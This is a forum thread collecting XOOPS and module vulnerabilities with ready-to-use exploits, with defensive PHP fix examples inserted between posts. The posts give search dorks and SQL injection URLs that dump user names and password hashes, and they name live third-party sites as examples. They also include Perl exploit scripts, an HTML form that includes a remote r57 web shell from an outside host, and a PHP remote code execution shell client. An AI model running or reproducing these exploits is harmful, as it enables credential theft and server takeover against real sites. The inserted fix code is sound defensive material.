[Vulnerability overview] Xoops and its modules.

Discussion in 'Web vulnerabilities' started by icedz, 15 Mar 2008.

  1. icedz

    Shit happens.
     
    #1 icedz, 15 Mar 2008
    Last edited: 19 Jan 2014
  2. iddqd

    LFI

    Vulnerable: XOOPS 2.0.18

    Vulnerable script: htdocs/install/index.php
    PHP:
    $language = 'english';
    if ( !empty($_POST['lang']) ) {
        $language = $_POST['lang'];
    .
    .
    .
    .
    if ( file_exists("./language/".$language."/install.php") ) {
        include_once "./language/".$language."/install.php";
    The POST variable "lang" is not filtered

    PoC:
    Code:
    POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
    Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
    Content-Length: 67
    Accept: */*
    Accept-Language: en-US
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php
    
    lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next
    URL Redirection

    Vulnerable: XOOPS 2.0.18

    Vulnerable script: htdocs/user.php?xoops_redirect
    The POST variable "xoops_redirect" is not filtered

    PoC:
    Code:
    http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com 
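The fix for the xoops_redirect item, as an added example that is not XOOPS code: a redirect target taken from the request is only honoured when it is a site-local path or an absolute URL on the site's own scheme, host and port; everything else falls back to the site root. `$siteUrl` stands in for the installation's base URL (XOOPS_URL in the real code), the inputs at the bottom are constructed, and PHP 8 is assumed.

```php
<?php
// Added example (not XOOPS code): validate a user-supplied redirect target so a
// "xoops_redirect"-style parameter can only send the browser back to this site.

function safe_redirect_target(string $requested, string $siteUrl): string
{
    $own = parse_url($siteUrl);
    if (!is_array($own) || !isset($own['scheme'], $own['host'])) {
        throw new InvalidArgumentException('siteUrl must be an absolute URL');
    }
    $origin   = $own['scheme'] . '://' . $own['host'] . (isset($own['port']) ? ':' . $own['port'] : '');
    $fallback = rtrim($siteUrl, '/') . '/';

    // Control characters (NUL, CR, LF, ...) are never legitimate in a target and
    // would otherwise end up inside the Location header.
    if ($requested === '' || preg_match('/[\x00-\x1f\x7f]/', $requested)) {
        return $fallback;
    }
    // "//host/..." and "/\host/..." are scheme-relative URLs, not local paths.
    if (preg_match('#\A/[/\\\\]#', $requested)) {
        return $fallback;
    }
    // A site-local absolute path: pin it to our own origin and accept it.
    if ($requested[0] === '/') {
        return $origin . $requested;
    }
    // Anything else must be an absolute URL on exactly our scheme, host and port.
    // (parse_url() puts "localhost@evilsite.com" tricks into 'host' as well, so
    // they fail the comparison.)
    $target = parse_url($requested);
    if (is_array($target)
        && isset($target['scheme'], $target['host'])
        && strcasecmp($target['scheme'], $own['scheme']) === 0
        && strcasecmp($target['host'], $own['host']) === 0
        && ($target['port'] ?? null) === ($own['port'] ?? null)) {
        return $requested;
    }
    return $fallback;
}

// Constructed inputs, modelled on the PoC above.
$site = 'http://localhost/xoops';
$inputs = [
    'http://evilsite.com',              // foreign host        -> fallback
    '//evilsite.com/x',                 // scheme-relative     -> fallback
    'http://localhost@evilsite.com/',   // userinfo trick      -> fallback
    "/xoops/index.php\r\nX: y",         // header injection    -> fallback
    '/xoops/index.php',                 // local path          -> accepted
    'http://localhost/xoops/user.php',  // same origin         -> accepted
];
foreach ($inputs as $input) {
    printf("%-36s => %s\n", addcslashes($input, "\0..\37"), safe_redirect_target($input, $site));
}
```

The fallback is deliberately the site root rather than an error page, so a malformed or hostile value degrades to harmless behaviour without giving the caller a signal about which check rejected it.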
    
     
  3. b!atnoy

    XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability

    Code:
    ##########################################
    #
    # XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
    #
    ##########################################
    #
    ##AUTHOR : S@BUN
    #
    ####HOME : http://www.milw0rm.com/author/1334
    #
    ####MAİL : [email protected]
    #
    ###########################################
    #
    # DORK 1 : allinurl: "modules/dictionary"
    #
    # DORK 2 : allinurl: "modules/dictionary/print.php?id"
    #
    ###########################################
    EXPLOIT :
    
    modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
    ###########################################
    Dictionary Version 0.94 by nagl.ch
    Dictionary Version 0.91 by nagl.ch
    Dictionary Version 0.70 by nagl.ch
    ###########################################
    ##################S@BUN####################
    ###########################################
    #####[email protected]#####
    ###########################################
    
    # milw0rm.com [2008-03-17]

     
  4. iddqd

    XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability

    SQL Injection

    Vulnerable: XOOPS Project-Recette(Recipe)2.2

    Exploit:
    Code:
    modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
    
    Dork:
    Code:
    allinurl :\"modules/recipe\"
    
     
  5. iddqd

    RFI

    Vulnerable: XOOPS Module XFsection

    Vuln script: modify.php

    PoC:
    Code:
    http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
    
    Vulnerable: XOOPS Module XT-Conteudo

    Vuln script: /admin/spaw/spaw_control.class.php
    PHP:
    include $spaw_root.'config/spaw_control.config.php';
    include $spaw_root.'class/toolbars.class.php';
    include $spaw_root.'class/lang.class.php';
    PoC:
    Code:
    http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?
    
    Vulnerable: XOOPS Module Cjay Content 3

    Vuln script: /admin/editor2/spaw_control.class.php
    PHP:
    include $spaw_root.'config/spaw_control.config.php';
    include $spaw_root.'class/toolbars.class.php';
    include $spaw_root.'class/lang.class.php';
    Note: Register globals must be ON, and Magic Quotes must be OFF

    PoC:
    Code:
    http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?
    Vulnerable: XOOPS Module icontent 1.0

    Exploit:
    HTML:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html;
    charset=windows-1254">
    <title>XOOPS Module icontent v.1.0 Remote File Inclusion
    Exploit</title>
    
    <script language="JavaScript">
    
    //'===============================================================================================
    //'[Script Name: XOOPS Module icontent v.1.0
    //'[Author     : Mahmood_ali
    //'[S.Page     : http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
    //'===============================================================================================
    
    //'[[V.Code]]------------------------------------------------------
    //'
    //'include $spaw_root.'config/spaw_control.config.php';
    //'include $spaw_root.'class/toolbars.class.php';
    //'include $spaw_root.'class/lang.class.php';
    //'
    //'[[V.Code]]---------------------------------------------------------
    
    //# Tryag.Com
    //# ...
    
    
    
    
       var path="/modules/icontent/include/wysiwyg/"
       var adres="spaw_control.class.php" //File name
       var acik ="?spaw_root=" // Line 15
       var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell
    
       function command(){
           if (document.rfi.target1.value==""){
              alert("Failed..");
          return false;
        }
    
    
    
      rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
      rfi.submit(); // Form Submit
       }
    </script>
    
    </head>
    
    <body bgcolor="#000000">
    <center>
    
    <p><b><font face="Arial" size="2"
    color="#FFFFFF">XOOPS Module icontent 
    v.1.0 Remote File Inclusion Exploit</font></b></p>
    
    <p></p>
    <form method="post" target="getting"
    name="rfi" onSubmit="command();">
        <b><font face="Tahoma" size="1"
    color="#FF0000">Target:</font><font 
    face="Tahoma" size="1" 
    color="#FFFF00">[http://[target]/[scriptpath]</font><font
    color="#00FF00" 
    size="2" face="Tahoma">
      </font><font color="#FF0000"
    size="2"> </font></b>
      <input type="text" name="target1"
    size="20" style="background-color: 
    #808000"
    onmouseover="javascript:this.style.background='#808080';" 
    onmouseout="javascript:this.style.background='#808000';"></p>
      <p><input type="submit" value="Gonder"
    name="B1"><input type="reset" 
    value="Sifirla" name="B2"></p>
    </form>
    <p><br>
    <iframe name="getting" height="337"
    width="633" scrolling="yes" 
    frameborder="0"></iframe>
    </p>
    
    <b><font face="Lucida Handwriting" size="5" 
    color="#FF0000">Mahmood_ali</font></b><p>
    <b><a href="http://tryag.com/cc">
    <font face="Lucida Handwriting" size="5" 
    color="#FFFFFF">TrYaG-Team</font></a></b></p>
    </p>
    </center>
    </body>
    
    </html>
    
    Vulnerable: XOOPS Module tsdisplay4xoops 0.1

    PoC:
    Code:
    [Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell
    

    Remote SQL Injection

    Vulnerable: XOOPS Module Jobs <= 2.4

    Code:
    #!/usr/bin/perl
    #[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
    #[Coded by   : ajann
    #[Author     : ajann
    #[Contact    : :(
    #[Dork       : "inurl:/modules/jobs/"
    #[S.Page     : http://www.jlmzone.com/
    #[$$         : Free
    #[..         : ajann,Turkey
    
    
    use IO::Socket;
    if(@ARGV < 1){
    print "
    [========================================================================
    [//  XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
    [//                   Usage: exploit.pl [target]
    [//                   Example: exploit.pl victim.com
    [//                   Example: exploit.pl victim.com
    [//                           Vuln&Exp : ajann
    [========================================================================
    ";
    exit();
    }
    #Local variables
    $kapan = "/*";
    $server = $ARGV[0];
    $server =~ s/(http:\/\/)//eg;
    $host = "http://".$server;
    $port = "80";
    $file = "/modules/jobs/index.php?pa=jobsview&cid=";
    
    print "Script <DIR> : ";
    $dir = <STDIN>;
    chop ($dir);
    
    if ($dir =~ /exit/){
    print "-- Exploit Failed[You Are Exited] \n";
    exit();
    }
    
    if ($dir =~ /\//){}
    else {
    print "-- Exploit Failed[No DIR] \n";
    exit();
     }
    
    print "User ID (uid): ";
    $id = <STDIN>;
    chop ($id);
    
    $target =
    "-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
    $target = $host.$dir.$file.$target;
    
    #Writing data to socket
    print
    "+**********************************************************************+\n";
    print "+ Trying to connect: $server\n";
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
    => "$server", PeerPort => "$port") || die
    "\n+ Connection failed...\n";
    print $socket "GET $target HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    print "+ Connected!...\n";
    #Getting
    while($answer = <$socket>) {
    if ($answer =~ /username:(.*?)pass/){
    print "+ Exploit succeed! Getting admin information.\n";
    print "+ ---------------- +\n";
    print "+ Username: $1\n";
    }
    
    if ($answer =~ /password:(.*?)<\/b>/){
    print "+ Password: $1\n";
    }
    
    if ($answer =~ /Syntax error/) { 
    print "+ Exploit Failed : ( \n";
    print
    "+**********************************************************************+\n";
    exit(); 
    }
    
    if ($answer =~ /Internal Server Error/) {
    print "+ Exploit Failed : (  \n";
    print
    "+**********************************************************************+\n";
    exit(); 
    }
     }
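The three `include $spaw_root.'...'` lines quoted for XT-Conteudo, Cjay Content and icontent all share one defect: the include prefix is a variable that register_globals lets the request populate. As an added example, not code from the SPAW editor or from any XOOPS module, here is the defensive shape of that code: the prefix is derived from the script's own location, the interpreter settings the post relies on are checked up front, and nothing is included unless it resolves to a regular file below the prefix. The directory tree is constructed in a temp folder for the demo (the file names are the ones from the post) and PHP 8 is assumed.

```php
<?php
// Added example, not SPAW/XOOPS code: a request can no longer choose where the
// editor's includes come from.

// 1. Refuse to run while the interpreter still allows what the post relies on:
//    register_globals (named in the post; gone since PHP 5.4, so ini_get gives
//    false there) and allow_url_include, which is what lets "spaw_root=http://..."
//    pull code from another host in the first place.
foreach (['register_globals', 'allow_url_include'] as $setting) {
    if (filter_var(ini_get($setting), FILTER_VALIDATE_BOOLEAN)) {
        fwrite(STDERR, "$setting is On; refusing to start\n");
        exit(1);
    }
}

// 2. Include only files that resolve to a regular file inside a fixed base dir.
function include_local(string $root, string $relative): mixed
{
    $base = realpath($root);
    $full = realpath($root . '/' . $relative);   // false for URLs and missing files
    if ($base === false || $full === false
        || !is_file($full)
        || !str_starts_with($full, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException("refusing to include '$relative'");
    }
    return require $full;
}

// 3. The prefix comes from the file system, never from $_GET/$_POST/globals.
//    (Here it points at a constructed demo tree standing in for the editor dir.)
$spaw_root = sys_get_temp_dir() . '/spaw-demo-' . getmypid();
mkdir("$spaw_root/config", 0700, true);
mkdir("$spaw_root/class", 0700, true);
file_put_contents("$spaw_root/config/spaw_control.config.php", "<?php return 'config loaded';");
file_put_contents("$spaw_root/class/toolbars.class.php", "<?php return 'toolbars loaded';");
file_put_contents("$spaw_root/class/lang.class.php", "<?php return 'lang loaded';");

$attempts = [
    'config/spaw_control.config.php',   // legitimate
    'class/toolbars.class.php',         // legitimate
    'class/lang.class.php',             // legitimate
    '../../etc/passwd',                 // traversal: resolves outside the base dir
    'http://attacker.invalid/r57.txt',  // remote include: realpath() returns false
];
foreach ($attempts as $relative) {
    try {
        printf("%-36s => %s\n", $relative, include_local($spaw_root, $relative));
    } catch (RuntimeException $e) {
        printf("%-36s => %s\n", $relative, $e->getMessage());
    }
}

// cleanup of the demo tree
foreach (['config/spaw_control.config.php', 'class/toolbars.class.php', 'class/lang.class.php'] as $f) {
    unlink("$spaw_root/$f");
}
rmdir("$spaw_root/config");
rmdir("$spaw_root/class");
rmdir($spaw_root);
```

The realpath() step is what makes the check robust: it resolves `..` segments and symlinks before the prefix comparison, and it returns false for anything that is not an existing local path, which covers every `http://` and `ftp://` value in one test.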
    
     
  6. Solide Snake

    Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

    Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

    PHP:
    #############################################
    #Coded By Cr@zy_King      http://coderx.org]#
    #############################################

    use IO::Socket;

    if (@ARGV != 3)
    {
        print "\n-----------------------------------\n";
        print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
        print "-----------------------------------\n";
        print "\n4ever Cra\n";
        print "crazy_kinq[at]hotmail.co.uk\n";
        print "http://coderx.org\n";
        print "\n-----------------------------------\n";
        print "\nKullanim: $0 <server> <path> <uid>\n";
        print "Ornek: $0 www.victim.com /path 1\n";
        print "\n-----------------------------------\n";
        exit ();
    }

    $server = $ARGV[0];
    $path = $ARGV[1];
    $uid = $ARGV[2];

    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
    printf $socket ("GET %s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n", $path, $server, $uid);

    while(<$socket>)
    {
        if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
    }

    # Cr@zy_King
    # http://coderx.org
    [email protected]
     
  7. ph1l1ster

    Solide Snake, I have never once run into a blind one.

    xoops # Article Module # sql injection


    Code:
    modules/articles/article.php?id={SQL}--
    +xoops_users
    -uname
    -pass


    example:

    Code:
    http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_users+limit+0,1--
    mega exploit :D :

    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    print qq(
    # xoops article module exploit #
    #     coded by ph1l1ster       #\n\n# Enter site:\n> );
    $site = <STDIN>;chomp($site);
    print "\n# Enter numbers of users:\n> ";
    $users = <STDIN>;chomp($users);
    &inj;
    sub inj{
    print "\nStarting..\n\n";
    $limit = 0;
    while ($limit <= $users){
    $url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,uname,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
    $client = LWP::UserAgent->new( ) or die;
    $answer = $client->get($url);
    $limit ++;
    if ($answer->content =~ /555666:(.*):777888/){
    print $1."\n";}}
    print "Done!"}
     
  8. HAXTA4OK

    XOOPS modules/easyweb/

    SQL-inj

    Exploit
    Code:
    -555555+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--
    http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+from+xoops_users--

    dOrK: inurl:/modules/easyweb/
     
    #8 HAXTA4OK, 3 Sep 2009
    Last edited: 3 Sep 2009
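Every injection in this thread (dictionary, recipe, articles, jobs, easyweb) has the same shape: a numeric `id`/`cid`/`artid` concatenated straight into the query, which is why `-9999 union select ... from xoops_users` works. As an added example, not code from XOOPS or from any of these modules, here is the fix: validate the parameter as an integer and bind it in a prepared statement. The articles table and its rows are constructed for the demo, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Added example, not XOOPS code: an id parameter that can never become SQL text.

function fetch_article(PDO $db, string $rawId): ?array
{
    // FILTER_VALIDATE_INT accepts whole decimal integers only. intval() would
    // silently turn "-9999 union select ..." into -9999 and the probe would come
    // back as "no such article" instead of being rejected where it can be logged.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('invalid article id: ' . substr($rawId, 0, 40));
    }
    // The id travels as a bound parameter; the SQL string is a constant.
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory table standing in for a module's content table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO articles (id, title) VALUES (1, 'First article'), (2, 'Second article')");

// Constructed inputs: two legitimate, two shaped like the payloads in this thread.
foreach (['2', '99', '-9999 union select 1,2 from xoops_users--', '2 or 1=1'] as $input) {
    try {
        $row = fetch_article($db, $input);
        printf("%-45s => %s\n", $input, $row ? $row['title'] : 'no such article');
    } catch (InvalidArgumentException $e) {
        printf("%-45s => rejected: %s\n", $input, $e->getMessage());
    }
}
```

Rejecting rather than coercing matters for detection as much as for safety: the exception message is the place to hook an alert, because a legitimate client never sends a non-numeric id to this endpoint.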
  9. [x60]unu

    XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

    Code:
    #!/usr/bin/php -q
    <?php
    
    /****************************************************************
     * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
     * by athos - staker[at]hotmail[dot]it                          *            
     * http://xoops.org                                             *           
     *                                                              *             
     * thanks to s3rg3770 and The:Paradox                           *            
     *                                                              *            
     * works with register globals on                               *            
     * note: this vuln is a remote php code execution               *              
     *                                                              *   
     * Directory (xoops_lib/modules/protector/)                     *
     * onupdate.php?mydirname=a(){} [PHP CODE] function v           *
     * oninstall.php?mydirname=a(){} [PHP CODE] function v          *
     * notification.php?mydirname=a(){} [PHP CODE] function v       *
     ****************************************************************/
    
    error_reporting(0);
    
    list($cli,$host,$path,$num) = $argv;
    
    if ($argc != 4) {  
        
        print "\n+--------------------------------------------------------------+\n";
        print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |\n";    
        print "\r+--------------------------------------------------------------+\n";
        print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
        print "\rUsage: php xpl.php [host] [path]\n\n";
        print "\rhost     + localhost\n";
        print "\rpath     + /XOOPS\n";
        exit;      
    }         
    
    exploit();
    
    function exploit() {
        
        global $num;
        
        if ($num > 3) {
           die("\n$num isn't a valid option\n");
        } 
        else {
           yeat_shell();
        }
    }
    
        
    function yeat_shell() {
        
        while (1) {
            echo "yeat[php-shell]~$: "; 
            $exec = stripslashes(trim(fgets(STDIN)));  
            
            if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
            if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
            if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");
    
            print data_exec($exec);     
        }
    }
    
    
    function data_exec($exec) {
        
        global $host,$path,$num;
        
        if ($num == 1) {
            $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
        }
        
        if ($num == 2) {
            $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
        }
        
        if ($num == 3) {
            $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
        }
        
        $exec = urlencode($exec);
        $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
        $data .= "Host: {$host}\r\n";
        $data .= "User-Agent: Lynx (textmode)\r\n";
        $data .= "Connection: close\r\n\r\n";
        
        $html = data_send ($host,$data);
    
        return $html;
    }
    
    
    function data_send ($host,$data) {
       
        if (!$sock = @fsockopen($host,80)) {
            die("Connection refused,try again!\n");
        }   fputs($sock,$data);
        
        while (!feof($sock)) { $html .= fgets($sock); }
        
        fclose($sock);
        return $html;
    }
    (c)milw0rm.com
     
  10. [underwater]

    LFI[Xoops 2.2.6]

    This version came my way.
    Look at the source of system/admin.php:

    Code:
    <?php
    if (isset($_POST['fct'])) {
    $fct = trim($_POST['fct']);
    }
    if (isset($_GET['fct'])) {
    $fct = trim($_GET['fct']);
    }
    $xoopsOption['pagetype'] = "admin";
    include "../../mainfile.php";
    if (!$xoopsUser) {
    redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
    }
    include XOOPS_ROOT_PATH."/include/cp_functions.php";
    
    include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
    $error = false;
    if (isset($fct) && $fct != '') {
    if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {
    
    if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
    include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
    } elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
    ...
    }
    include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
    ...
    Exploit:

    Code:
    http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00
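The `fct` parameter above, the `lang` parameter in the install/index.php post and the `mydirname` parameter in the protector post are all supposed to name a directory, and all three are used unvalidated as a path or code fragment. As an added example, not XOOPS code, here is one validator that serves all three: a strict allow-list of characters followed by a check that the name is an existing subdirectory, which beats trying to strip `../` or `%00` after the fact. The language tree is constructed in a temp folder for the demo, the sample inputs are taken from the PoCs in this thread, and PHP 8 is assumed.

```php
<?php
// Added example, not XOOPS code: a directory-name parameter that cannot
// traverse, cannot carry a NUL byte and cannot be read as PHP syntax.

function safe_dir_component(string $value, string $parentDir): string
{
    // Gate 1: plain directory names only. This rejects "/", "\", ".", NUL
    // (the "%00" in the PoCs) and anything PHP could parse as code ("a(){}").
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9_-]{0,63}\z/', $value)) {
        throw new InvalidArgumentException('bad characters in name: ' . bin2hex($value));
    }
    // Gate 2: it must be an existing direct subdirectory of $parentDir.
    // realpath() follows symlinks, so a link pointing outside is caught as well.
    $base = realpath($parentDir);
    $dir  = realpath($parentDir . DIRECTORY_SEPARATOR . $value);
    if ($base === false || $dir === false || !is_dir($dir) || dirname($dir) !== $base) {
        throw new InvalidArgumentException("no such directory under $parentDir: $value");
    }
    return $value;
}

// What install/index.php's language selection looks like with the gate in front
// of the include: fall back to english and log the rejected value.
function pick_language(string $requested, string $langDir): string
{
    try {
        $name = safe_dir_component($requested, $langDir);
    } catch (InvalidArgumentException $e) {
        error_log('rejected lang parameter: ' . $e->getMessage());  // worth alerting on
        $name = 'english';
    }
    return include "$langDir/$name/install.php";  // each demo file returns a string
}

// Constructed demo tree.
$root = sys_get_temp_dir() . '/lang-demo-' . getmypid();
foreach (['english', 'russian'] as $lang) {
    mkdir("$root/$lang", 0700, true);
    file_put_contents("$root/$lang/install.php", "<?php return '$lang strings loaded';");
}

$inputs = [
    'russian',                                      // legitimate
    '/../../../../../../../../boot.ini%00.html',    // install/index.php PoC
    "../../../../../../../etc/passwd\0",           // system/admin.php PoC (URL-decoded)
    'a(){} function v',                             // mydirname PoC shape
    'german',                                       // well-formed, but no such directory
];
foreach ($inputs as $input) {
    printf("%-44s => %s\n", addcslashes($input, "\0..\37"), pick_language($input, $root));
}

// cleanup of the demo tree
foreach (['english', 'russian'] as $lang) {
    unlink("$root/$lang/install.php");
    rmdir("$root/$lang");
}
rmdir($root);
```

For `fct` the same function would be called with `XOOPS_ROOT_PATH."/modules/system/admin"` as the parent, and for `mydirname` with the modules directory; because the regex admits only identifier characters, a value that passes it is also safe to interpolate into a generated function name, which is the other way this thread shows the parameter being abused.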